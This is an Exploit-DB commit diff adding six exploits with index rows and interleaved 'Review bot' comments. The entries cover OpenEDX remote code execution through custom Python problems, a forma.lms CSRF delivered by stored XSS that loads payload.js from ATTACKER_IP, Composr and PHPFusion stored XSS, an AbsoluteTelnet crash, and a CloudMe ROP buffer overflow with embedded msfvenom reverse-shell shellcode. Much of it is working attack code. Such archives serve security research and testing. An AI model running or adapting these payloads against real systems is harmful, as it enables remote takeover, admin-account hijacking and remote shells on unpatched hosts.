DB: 2020-05-22

6 changes to exploits/shellcodes

AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)

CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)
forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)
Composr CMS 10.0.30 - Persistent Cross-Site Scripting
PHPFusion 9.03.50 - Persistent Cross-Site Scripting
OpenEDX platform Ironwood 2.5 - Remote Code Execution
Offensive Security 2020-05-22 05:01:54 +00:00
parent b76fd66d1f
commit b6194a254f
7 changed files with 421 additions and 0 deletions


@ -0,0 +1,44 @@
# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-20
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://open.edx.org/
# Software Link: https://github.com/edx/edx-platform
# Version: Ironwood 2.5
# Tested on: Debian x64
# CVE : CVE-2020-13144
CVE ID: CVE-2020-13144
OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced
This is an authenticated vulnerability, so you need to register an account, go to /edx-studio
Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code
Once here we just need to edit the problem and introduce a payload such as:
<problem>
<script type="python">
def test_add(expect,ans):
import os
os.system("thecommandyouwanttoexecute")
</script>
<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
<textline size="10" correct_answer="11" label="Integer #1"/><br/>
<textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>
<solution>
<div class="detailed-solution">
<p>Solution or Explanation Heading</p>
<p>Solution or explanation text</p>
</div>
</solution>
</problem>
And click Submit, and you will execute commands in the machine
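Review bot: the file states the precondition for the bug (the line beginning `OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail ... is not enforced`) but never states the remediation, so a reader cannot tell how to close the issue; add a line such as `# Fix: enforce CodeJail sandboxing for custom Python-evaluated problems` next to the CVE field. The CVE also appears twice on consecutive lines (`# CVE : CVE-2020-13144` and `CVE ID: CVE-2020-13144`); keep only the commented header form, which is the format the other files in this commit use.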


@ -0,0 +1,47 @@
# Exploit Title: forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)
# Date: 2020-05-21
# Exploit Author: Daniel Ortiz
# Vendor Homepage: https://sourceforge.net/projects/forma/
# Tested on: XAMPP for Linux 64bit 5.6.40-0
## 1 - Description
- Vulnerable form: Edit Profile
- Details: The validation of the CSRF token depends on request method. Changing the request method from POST to GET the token validation is omitted by the backend.
- Privileges: It requires admin privileges to change the admin email.
- Location: Admin Area >user profile > Edit form
- Endopoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo
## 2 -Triggering the Vulnerability
To trigger this vulnerability the admin user must log in to the system.
1) Setup a HTTP server on the attacker machine, e.g: python -m SimpleHTTPServer 9090
2) In the attacker machine create a file with this content:
[+] payload.js
var target = document.location.host;
var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&up_email=hacked@admin.com&user_preference[ui.language]=0&up_signature=&save=Save+changes";
function pwnEmail(){
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true);
xhr.send(null);
}
pwnEmail();
3) Edit a course and in the description field put this payload:
<script src="http://ATTACKER_IP:PORT/payload.js"/>
The description field is vulnerable to XSS attacks and is used to trigger the csrf payload.
4) Go to index page in formalms/appLms/index.php?r=lms/mycourses/show this trigger the XSS payload in the description field (the payload loads the payload.js file and execute the CSRF payload)
5) The payload.js file is executed and the admin email is changed
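Review bot: the endpoint given in section 1 (`- Endopoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo`) does not match the path requested by payload.js (`/formalms/appLms/index.php?`), so one of the two is wrong; reconcile them and fix the spelling of `Endpoint`. Section 1 also names the root cause (token validation skipped when the method is GET) without the corresponding fix; a one-line remediation, validating the token for every request method and rejecting state-changing requests over GET, would make the report useful to defenders as well as testers.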


@ -0,0 +1,90 @@
# Title: Composr CMS 10.0.30 - Persistent Cross-Site Scripting
# Author: Manuel Garcia Cardenas
# Date: 2020-02-06
# Vendor: https://compo.sr/
# CVE: N/A
=============================================
MGC ALERT 2020-001
- Original release date: February 06, 2020
- Last revised: May 21, 2020
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2020-8789
=============================================
I. VULNERABILITY
-------------------------
Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting
II. BACKGROUND
-------------------------
Composr CMS (or Composr) is a web application for creating websites. It is
a combination of a Web content management system and Online community
(Social Networking) software. Composr is licensed as free software and
primarily written in the PHP programming language.
III. DESCRIPTION
-------------------------
Has been detected a Persistent XSS vulnerability in Composr CMS, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
Go to: Security -> Usergroups -> Edit Usergroup
Select one Usergroup (for example Guest) and edit the Name (parameter name)
for example with Guests"><script>alert(1)</script>
The variable "name" it is not sanitized, later, if some user visit the
"Zone editor" area, the XSS is executed, in the response you can view:
<input type="hidden" name="label_for__access_1" value="Access for
Guests"><script>alert(1)</script>" />
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or Javascript code in a targeted
user's browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.
VI. SYSTEMS AFFECTED
-------------------------
Composr CMS <= 10.0.30
VII. SOLUTION
-------------------------
Disable until a fix is available.
VIII. REFERENCES
-------------------------
https://compo.sr/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
February 06, 2020 1: Initial release
May 21, 2020 2: Last revision
XI. DISCLOSURE TIMELINE
-------------------------
February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2020 2: Send to vendor
April 06, 2020 3: New request, vendor doesn't answer.
May 21, 2020 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
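Review bot: the header line `# CVE: N/A` contradicts the advisory body, which assigns `- CVE-ID: CVE-2020-8789`; the header should carry the same identifier so the entry is indexable by CVE. Minor: the severity is written `4,8/10` with a decimal comma, and the disclosure timeline ends at `May 21, 2020 4: Sent to lists` without naming a fixed release, so section VII (`Disable until a fix is available.`) should state explicitly that no patched version was known at publication.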


@ -0,0 +1,78 @@
# Exploit Title: PHPFusion 9.03.50 - Persistent Cross-Site Scripting
# Date: 2020-05-20
# Exploit Author: coiffeur
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: v9.03.50
## How?
When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped as it can be seen when I tried here to fuzz the message field with the string `i<3"'ivoire`.
https://therealcoiffeur.github.io/captures/c5_1.png
https://therealcoiffeur.github.io/captures/c5_2.png
https://therealcoiffeur.github.io/captures/c5_3.png
It's when I became interested in the print feature that things turned out to be interesting. Indeed, the print function allows you to simplify the page as much as possible so that it contains only text. So the print function returns all messages in text format so that the content of a thread can be easily printed (in order to generate this result it is necessary to click on the button circled in blue in figure 3).
![alt text](../captures/c5_4.png "Figure 5: Injection of HTML character (part 3)")
![alt text](../captures/c5_5.png "Figure 6: Injection of HTML character (part 3)")
Once the page is generated by the print functionality we realize by analyzing the body of the server response, that our characters are no longer sanitized.
Now we just have to create a message that will allow us to execute JavaScript by replacing the contents of the previous message with:
```html
<img onerror="alert(1)" src=xxx>
```
https://therealcoiffeur.github.io/captures/c5_4.png
https://therealcoiffeur.github.io/captures/c5_5.png
## Why?
The route requested to generate this result is the route <span style="color:red">\<ROOT\>/print.php?type=F&item_id=1&rowstart=0</span>. It is thus page <span style="color:red">\<ROOT\>/print.php</span> which is called, with the following parameters:
```
$_GET array (size=3)
'type' => string 'F' (length=1)
'item_id' => string '1' (length=1)
'rowstart' => string '0' (length=1)
```
File: <span style="color:red">\<ROOT\>/print.php</span>
```php
...
case "F":
...
echo parse_textarea($data['post_message']);
...
```
File: <span style="color:red">\<ROOT\>/includes/core_functions_include.php</span>
```php
function parse_textarea($text, $smileys = TRUE, $bbcode = TRUE, $decode = TRUE, $default_image_folder = IMAGES, $add_line_breaks = FALSE, $descript = TRUE) {
$text = $decode == TRUE ? html_entity_decode(stripslashes($text), ENT_QUOTES, fusion_get_locale('charset')) : $text;
$text = $decode == TRUE ? html_entity_decode($text, ENT_QUOTES, fusion_get_locale('charset')) : $text; // decode for double encoding.
$text = !empty($default_image_folder) ? parse_imageDir($text, $default_image_folder) : $text;
$text = $smileys == TRUE ? parsesmileys($text) : $text;
$text = $bbcode == TRUE ? parseubb($text) : $text;
$text = fusion_parse_user($text);
$text = $add_line_breaks ? nl2br($text) : $text;
$text = $descript == TRUE ? descript($text) : $text;
return (string)$text;
}
```
As you can see by reading the function code of `parse_textarea()`, the text is not sanitized, which leads to the Stored XSS.
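Review bot: the conclusion `the text is not sanitized` is not what the quoted function shows: `parse_textarea()` runs `descript($text)` by default (the `$descript == TRUE` branch), and what it visibly does do is call `html_entity_decode()` twice, which would undo the escaping the author observed when the message was stored. The write-up should say which of these is the actual root cause (print.php skipping `descript`, or `descript()` not neutralising event-handler attributes such as `onerror`), because that decides whether the fix belongs in print.php's output encoding or in `descript()` itself. Separately, two image references use relative paths (`![alt text](../captures/c5_4.png ...)`) that will not resolve outside the author's own repository while the others use full github.io URLs, and both captions read `(part 3)`; use one form and number the captions consistently.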

exploits/windows/dos/48493.py Executable file

@ -0,0 +1,30 @@
# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
# Discovered by: Xenofon Vassilakopoulos
# Discovered Date: 2020-05-21
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
# Tested Version: 11.21
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1
# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)
# Steps to reproduce:
# 1. - Run python script
# 2. - Open absolutetelnet.txt and copy content to clipboard
# 3. - Open AbsoluteTelnet 11.21
# 4. - Select "new connection file -> Connection -> SSH2"
# 5. - Paste the contents at the field "Authentication -> Username"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.21
# 9. - A new window will appear that prompts you to send an error report
# 10.- Open absolutetelnet.txt and copy content to clipboard
# 11.- Paste the contents at the field "Your Email Address (optional)"
# 12.- press "Send Error Report" button
# 13.- Crashed
buf = "\x41" * 1000
f = open ("absolutetelnet.txt", "w")
f.write(buf)
f.close()
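Review bot: the metadata is inconsistent: `# Exploit Title` names only the 'Username' field, while `# Description` names `'SHA2/Username' and 'Send Error Report'` and steps 10 to 13 exercise that second field; align the title with the description (or drop the second crash from the description) so the CSV entry matches what the file demonstrates. Style: the three lines `f = open ("absolutetelnet.txt", "w")` / `f.write(buf)` / `f.close()` should be a `with open(...) as f:` block so the handle is closed even if the write fails.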


@ -0,0 +1,126 @@
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
# Date: 2020-05-20
# Exploit Author: Xenofon Vassilakopoulos
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 7 Professional x86 SP1
# Steps to reproduce:
# 1. On your local machine start the CloudMe service.
# 2. change the reverse tcp shellcode using the IP and Port of your host using the following command
# msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python
# 3. Run the python script.
import struct
import socket
target = "127.0.0.1"
########################################################################
# Get kernel32 address from the stack
# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe
rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll]
rop+= struct.pack('L',0x0385FF88) # Offset
rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x0362fffc) # Offset
rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll]
# Calculate VirtualProtect relative to the leaked kernel32 address
rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffae493) # Offset
rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll]
########################################################################
# Setup VirtualProtect
# edi
rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll]
# esi
rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect
# edx
rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040
rop+= struct.pack('L',0x41414141) # Filler
rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll]
# ebx
rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201
rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll]
# ebp
rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes
# eax & ecx
rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll]
rop+= struct.pack('L',0x90909090) # NOP
rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll]
# push registers to stack
rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll]
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
buf = b""
buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f"
buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83"
buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff"
buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15"
buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2"
buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99"
buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1"
buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87"
buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78"
buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c"
buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29"
buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7"
buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6"
buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1"
buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde"
buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4"
buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16"
buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08"
buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e"
buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae"
buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58"
buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b"
buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb"
buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d"
buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd"
buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b"
##########
junk1 = "\x41"*1604
nops = "\x90"*16
junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1))
seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll]
payload = junk1 + rop + nops + buf + junk2 + seh
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
except Exception as e:
print(sys.exc_value)
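Review bot: the exception handler references `sys.exc_value` but `sys` is never imported (only `struct` and `socket` are), and `exc_value` exists only in Python 2, so a failed connection will itself raise a `NameError` instead of reporting the error; print the already-bound `e` instead. The header should also record the interpreter version under `# Tested on:`, since the script concatenates a bytes buffer (`buf = b""`) with plain `str` padding (`junk1 = "\x41"*1604`), which only works on Python 2.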


@ -6732,6 +6732,7 @@ id,file,description,date,author,type,platform,port
48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,
48493,exploits/windows/dos/48493.py,"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)",2020-05-21,"Xenofon Vassilakopoulos",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11074,6 +11075,7 @@ id,file,description,date,author,type,platform,port
48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
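Review bot: the new row `48499,exploits/windows/local/48499.txt,...` gives the CloudMe exploit a `.txt` extension although the file added in this commit is a Python script (it imports `struct` and `socket` and builds the payload in code), unlike `48493.py`, `48469.py` and `48461.py` in the same section; name it `48499.py`. The description `(SEH_DEP_ASLR)` also differs from the file's own header `(SEH,DEP,ASLR)`; use one spelling in both places.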
@ -42722,3 +42724,7 @@ id,file,description,date,author,type,platform,port
48489,exploits/php/webapps/48489.txt,"NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)",2020-05-19,JEBARAJ,webapps,php,
48490,exploits/php/webapps/48490.txt,"Victor CMS 1.0 - Authenticated Arbitrary File Upload",2020-05-19,"Kishan Lal Choudhary",webapps,php,
48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,
48494,exploits/php/webapps/48494.txt,"forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)",2020-05-21,"Daniel Ortiz",webapps,php,
48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,
48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,
48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
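Review bot: the `date` column for three of the four new rows is 2020-05-21 while the corresponding file headers give other dates (`# Date: 2020-02-06` for Composr, `# Date: 2020-05-20` for PHPFusion and OpenEDX); if the column records the publication date rather than the author's date, that should be documented. The author field also differs in spelling (`Manuel García Cárdenas` in the CSV against `Manuel Garcia Cardenas` in the advisory), so the index and the file should use one canonical form of the name.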
